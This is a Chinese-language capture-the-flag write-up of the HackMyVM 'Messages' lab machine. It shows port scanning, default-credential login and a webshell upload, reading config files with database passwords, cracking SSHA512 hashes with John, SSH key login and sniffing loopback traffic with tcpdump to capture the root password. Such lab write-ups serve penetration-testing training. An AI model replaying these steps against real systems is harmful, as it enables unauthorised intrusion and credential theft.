Messages靶场不一样的坑？

特别声明:

点此亲启

致各位

· 本公众号发布的靶场、文章项目中涉及的任何脚本工具，仅用于测试和学习研究，禁止用于商业用途，不能保证其合法性，准确性，完整性和有效性，请根据情况自行判断；

· 本文章、项目内靶场所有资源文件，禁止任何公众号、自媒体进行任何形式的擅自转载、发布

· PTEHUB 对任何脚本及工具问题概不负责，包括不限于由任何脚本错误导致的任何损失或损害及任何法律责任；

· 间接使用靶场、文章中的任何工具及技术，包括但不限于建立VPS或在某些行为违反国家/地区法律或相关法规的情况下进行传播, PTEHUB 对于由此引起的任何隐私泄漏或其他法律问题后果概不负责；

· 如果任何单位或个人认为该项目或文章的脚本可能涉嫌侵犯其权利，则应及时通知并提供身份证明，所有权证明，我们将在收到认证文件后删除相关内容；

· 以任何方式查看或使用此项目的人或直接或间接使用项目的任何脚本的使用者都应仔细阅读此声明；

· PTEHUB 保留随时更改或补充此免责声明的权利；

·一旦使用访问 PTEHUB 项目，则视为您已接受此免责声明。

您在本声明未发出之时，使用或者访问了 PTEHUB ，则视为已接受此声明，请仔细阅读。

此致

今天给大家带来的是HMV的靶场Messages属于Medium级别，靶场和WP同步发。大家可以同步进行操作学习，废话不多说开始一起卷起来。

探测靶机

这一次还是采用的是nmap进行扫描。

┌─[ptedev@ptedev-standardpci440fxpiix1996]─[~]└──╼ $sudo -i[sudo] password for ptedev:┌─[root@ptedev-standardpci440fxpiix1996]─[~]└──╼ #nmap -sT -A -v -p- 10.35.0.106Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-12 20:58 CST..........................Not shown: 65524 filtered tcp ports (no-response)PORT    STATE SERVICE    VERSION22/tcp  open  ssh        OpenSSH 8.4p1 Debian 5 (protocol 2.0)..........................25/tcp  open  smtp       Postfix smtpd|_smtp-commands: SMTP: EHLO 521 5.5.1 Protocol errorx0D53/tcp  open  domain     dnsmasq 2.81| dns-nsid:|_  bind.version: dnsmasq-2.8180/tcp  open  http       nginx| http-methods:|_  Supported Methods: GET HEAD POST OPTIONS|_http-title: Did not follow redirect to https://10.35.0.106/110/tcp open  pop3       Dovecot pop3d| ssl-cert: Subject: commonName=mx.messages.hmv/organizationName=mx.messages.hmv/stateOrProvinceName=GuangDong/countryName=CN..........................143/tcp open  imap       Dovecot imapd| ssl-cert: Subject: commonName=mx.messages.hmv/organizationName=mx.messages.hmv/stateOrProvinceName=GuangDong/countryName=CN..........................443/tcp open  ssl/http   nginx| ssl-cert: Subject: commonName=mx.messages.hmv/organizationName=mx.messages.hmv/stateOrProvinceName=GuangDong/countryName=CN..........................465/tcp open  ssl/smtps?|_smtp-commands: Couldn't establish connection on port 465..........................587/tcp open  smtp       Postfix smtpd..........................993/tcp open  imaps?..........................995/tcp open  pop3s?..........................TRACEROUTE (using proto 1/icmp)HOP RTT     ADDRESS1   0.27 ms OpenWrt.lan (192.168.3.1)2   0.74 ms 10.35.0.106NSE: Script Post-scanning...........................Completed NSE at 21:02, 0.00s elapsedRead data files from: /usr/bin/../share/nmapOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 230.36 seconds           Raw packets sent: 93 (7.536KB) | Rcvd: 37 (6.999KB)┌─[root@ptedev-standardpci440fxpiix1996]─[~]

从扫描的结果来看，开放了80、22、110、443等端口，其中110是pop3的端口，443中我们可以看到他有一个绑定的根域名是messages.hmv那我们就可以利用80绑定一下hosts试一试。80端口是nginx的中间件先尝试打开，这样就可以直接先看效果。

从访问的结果，可以看出这个是部署了两个程序一个是Chatbot在线聊天机器人的一个是Webmail邮件的系统。

这就是80端口的绑定的系统，从初步的主机探测来看，这个靶场的突破点应该是这两个系统了。

漏洞利用

在线客服机器人所用的ChatBot(by:oretnom23)v1.0 系统，可以找相应的exp进行测试。

https://www.sourcecodester.com/php/14788/simple-chatbot-application-using-php-source-code.html

从图中可以看到几个关键的信息一个是后台的路径在admin，另外一个是他有一个默认的用户名和密码。我们可以直接尝试登录。

登录成功之后，在后台主要找可以直接webshell的漏洞，如：文件上传、文件包含、代码执行等可直接利用的。在这里是直接利用的文件上传的漏洞进行webshell。

在这里是不需要使用burp进行抓包，先进行探测时候上传成功，假如第一次不成功的话再进一步进行burp抓包探测。可以省去不必要的麻烦。接下来直接用webshell工具链接即可，在这里我采用的是哥斯拉。

这里有一个坑！采用一句话没有链接成功，之后采用的是哥斯拉进行连接成功。

权限提升

查看/etc/passwd文件查看哪一个用户有登录的权限。或者找到/home下查看都有哪些账户的文件夹也是可以。同样也可以看到都具体安装了哪些软件，有web、mysql、tcpdump一些列。

root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologinman:x:6:12:man:/var/cache/man:/usr/sbin/nologinlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologinmail:x:8:8:mail:/var/mail:/usr/sbin/nologinnews:x:9:9:news:/var/spool/news:/usr/sbin/nologinuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologinproxy:x:13:13:proxy:/bin:/usr/sbin/nologinwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologinbackup:x:34:34:backup:/var/backups:/usr/sbin/nologinlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologinirc:x:39:39:ircd:/run/ircd:/usr/sbin/nologingnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologinnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin_apt:x:100:65534::/nonexistent:/usr/sbin/nologinsystemd-timesync:x:101:101:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologinsystemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologinsystemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologinmessagebus:x:104:110::/nonexistent:/usr/sbin/nologinavahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologinruby:x:1000:1000:Ruby,,,:/home/ruby:/bin/bashsystemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologinmysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/falsepostfix:x:107:115::/var/spool/postfix:/usr/sbin/nologinclamav:x:108:117::/var/lib/clamav:/bin/falsedovecot:x:109:118:Dovecot mail server,,,:/usr/lib/dovecot:/usr/sbin/nologindovenull:x:110:119:Dovecot login user,,,:/nonexistent:/usr/sbin/nologinamavis:x:111:120:AMaViS system user,,,:/var/lib/amavis:/bin/shdebian-spamd:x:112:121::/var/lib/spamassassin:/usr/sbin/nologinvmail:x:2000:2000::/home/vmail:/usr/sbin/nologinmlmmj:x:2003:2003::/var/vmail/mlmmj:/usr/sbin/nologiniredadmin:x:2001:2001::/home/iredadmin:/usr/sbin/nologiniredapd:x:2002:2002::/home/iredapd:/usr/sbin/nologinsshd:x:113:65534::/run/sshd:/usr/sbin/nologintcpdump:x:114:123::/nonexistent:/usr/sbin/nologin

通过home下的文件夹找到了userflag.txt文件，还有一个notes文件提示。

notes文件的内容，大概意思是ssh强口令，在密码可以在配置文件里找到。检查邮箱让其正常工作。

todo:trusted certificateChange shell password to match webmail (stronger password)done:check email/iredadmin working OK get chatbot workingconnect from desktopssh keys onlycreate mailbox for root scripts (same pw)待办事项：可信证书更改shell密码以匹配webmail（更强的密码）完成：检查电子邮件/IREDAMIN工作正常让聊天机器人工作从桌面连接仅限ssh密钥为根脚本创建邮箱（相同pw）

接下来我们先把邮件跑通，我们先想办法登录邮件服务器看一看，现在我们有webshell可以直接跑数据库，或者直接找到邮件服务器的数据库配置文件，这两个方式都进行尝试。

找到chatbot的配置文件/var/www/html/chatbot/initialize.php

<?php$dev_data = array('id'=>'-1','firstname'=>'Developer','lastname'=>'','username'=>'dev_oretnom','password'=>'5da283a2d990e8d8512cf967df5bc0d0','last_login'=>'','date_updated'=>'','date_added'=>'');if(!defined('base_url')) define('base_url','/chatbot/');if(!defined('base_app')) define('base_app', str_replace('\','/',__DIR__).'/' );if(!defined('dev_data')) define('dev_data',$dev_data);if(!defined('DB_SERVER')) define('DB_SERVER',"localhost");if(!defined('DB_USERNAME')) define('DB_USERNAME',"chatbot");if(!defined('DB_PASSWORD')) define('DB_PASSWORD',"chatbot");if(!defined('DB_NAME')) define('DB_NAME',"chatbot");?>

找到了几个用户和密码，密码是ssha512的

{SSHA512}dFxa19dkflt/1bQFQszaUTFjjK4SOjDMIw9ZWKEZbZ+E6o2rxTvqaG+O3EsKZcHXnnfVoVNNyVtlHH/OVOx8+XSO+mBLGCMA{SSHA512}hhZ4uS8n44dromQhH3DxyaJDDBeYc6Ey8Q+DcdXmb0dhL7mT2sRMTH5ipPULXVdgoMTelRVVQ2Ab8ZEJMgdFA/4L+sOtgDz9{SSHA512}rO8xmJtgYpBLiOI4SghgF6niJFEJrZujFlgx9ISHD7vqgtCg7U9wTulPqxBgkPKcqWwPMReJ2l9zdpYh/uXT6WjFElA=

又从webmail的配置文件找到的数据库密码，强度很高！但是我们找到的chatbot的数据库密码直接可以查看所有的数据库内容，所以这个密码显得就没有太大的作用，可以尝试登录ssh进行猜解一波密码。

// SQL DATABASE$config['db_dsnw'] = 'mysqli://roundcube:[email protected]:3306/roundcubemail';// LOGGING$config['log_driver'] = 'syslog';$config['syslog_facility'] = LOG_MAIL;

直接用John破解参数如下：

┌─[root@ptedev-standardpci440fxpiix1996]─[/home/ptedev]└──╼ #john --wordlist=/usr/share/wordlists/rockyou.txt hash.txtCreated directory: /root/.johnUsing default input encoding: UTF-8Loaded 3 password hashes with 3 different salts (SSHA512, LDAP [SHA512 128/128 SSE2 2x])Will run 4 OpenMP threadsPress 'q' or Ctrl-C to abort, almost any other key for statusRuby.r123        (?)1g 0:00:00:06 DONE (2022-02-13 15:15) 0.1579g/s 2265Kp/s 6219Kc/s 6219KC/s "bebo"..*7¡Vamos!Use the "--show" option to display all of the cracked passwords reliablySession completed┌─[root@ptedev-standardpci440fxpiix1996]─[/home/ptedev]└──╼ #john --show hash.txt?:xxxxxxx1 password hash cracked, 2 left

登录成功后，翻邮件总共是3封邮件，一封邮件是提示，另外一封是一个私钥。

结合之前找到的notes里曾经提到过使用密钥登录，那直接用私钥登录看是否可以登录成功。

直接将私钥上传到linux加上600权限即可

使用ssh私钥进行登录，登录成功后。直接是一个shell，接下来只要搞到root权限拿到flag就可以了。

┌─[✗]─[ptedev@ptedev-standardpci440fxpiix1996]─[~]└──╼ $ssh [email protected] -i id_rsaThe authenticity of host '10.35.0.106 (10.35.0.106)' can't be established.ECDSA key fingerprint is SHA256:g1XffKpBT1+qaCPmPgYje4y881mcoz3vyUr5/S6/yi8.Are you sure you want to continue connecting (yes/no/[fingerprint])? yesWarning: Permanently added '10.35.0.106' (ECDSA) to the list of known hosts.Linux Vul-2022-007 5.10.0-11-amd64 #1 SMP Debian 5.10.92-1 (2022-01-18) x86_64The programs included with the Debian GNU/Linux system are free software;the exact distribution terms for each program are described in theindividual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extentpermitted by applicable law.Last login: Thu Jan 27 14:44:20 2022ruby@Vul-2022-007:~$

I have got that script working so it will check any e-mails sent to the root account.Shouldnt need to worry about security as it uses 127.0.0.1 so nobody can intercept that.Root.百度翻译：我已经让该脚本工作，因此它将检查发送到根帐户的所有电子邮件。不需要担心安全性，因为它使用127.0.0.1，所以没有人可以拦截它。

从邮件的提示来看，系统是有一个自动发邮件的脚本，绑定在了127.0.0.1上。那么我们就应该想一下了，邮件发送需要什么，第一个是账户，第二个是密码。意思就是说那个脚本肯定是存在账户和密码的。那我们怎么才能搞到呢？最简单的形式就是能搞到本地的流量数据包就可以了，就可以识别到流量信息。开干！

ruby@Vul-2022-007:~$ tcpdump -i lo -w /tmp/pcap.pcaptcpdump: listening on lo, link-type EN10MB (Ethernet), snapshot length 262144 bytes

使用Wireshark直接过滤pop协议

用拿到的root密码，直接切换root账户。找到rootflag.txt文件

root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologinbin:x:2:2:bin:/bin:/usr/sbin/nologinsys:x:3:3:sys:/dev:/usr/sbin/nologinsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologinman:x:6:12:man:/var/cache/man:/usr/sbin/nologinlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologinmail:x:8:8:mail:/var/mail:/usr/sbin/nologinnews:x:9:9:news:/var/spool/news:/usr/sbin/nologinuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologinproxy:x:13:13:proxy:/bin:/usr/sbin/nologinwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologinbackup:x:34:34:backup:/var/backups:/usr/sbin/nologinlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologinirc:x:39:39:ircd:/run/ircd:/usr/sbin/nologingnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologinnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin_apt:x:100:65534::/nonexistent:/usr/sbin/nologinsystemd-timesync:x:101:101:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologinsystemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologinsystemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologinmessagebus:x:104:110::/nonexistent:/usr/sbin/nologinavahi-autoipd:x:105:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologinruby:x:1000:1000:Ruby,,,:/home/ruby:/bin/bashsystemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologinmysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/falsepostfix:x:107:115::/var/spool/postfix:/usr/sbin/nologinclamav:x:108:117::/var/lib/clamav:/bin/falsedovecot:x:109:118:Dovecot mail server,,,:/usr/lib/dovecot:/usr/sbin/nologindovenull:x:110:119:Dovecot login user,,,:/nonexistent:/usr/sbin/nologinamavis:x:111:120:AMaViS system user,,,:/var/lib/amavis:/bin/shdebian-spamd:x:112:121::/var/lib/spamassassin:/usr/sbin/nologinvmail:x:2000:2000::/home/vmail:/usr/sbin/nologinmlmmj:x:2003:2003::/var/vmail/mlmmj:/usr/sbin/nologiniredadmin:x:2001:2001::/home/iredadmin:/usr/sbin/nologiniredapd:x:2002:2002::/home/iredapd:/usr/sbin/nologinsshd:x:113:65534::/run/sshd:/usr/sbin/nologintcpdump:x:114:123::/nonexistent:/usr/sbin/nologin0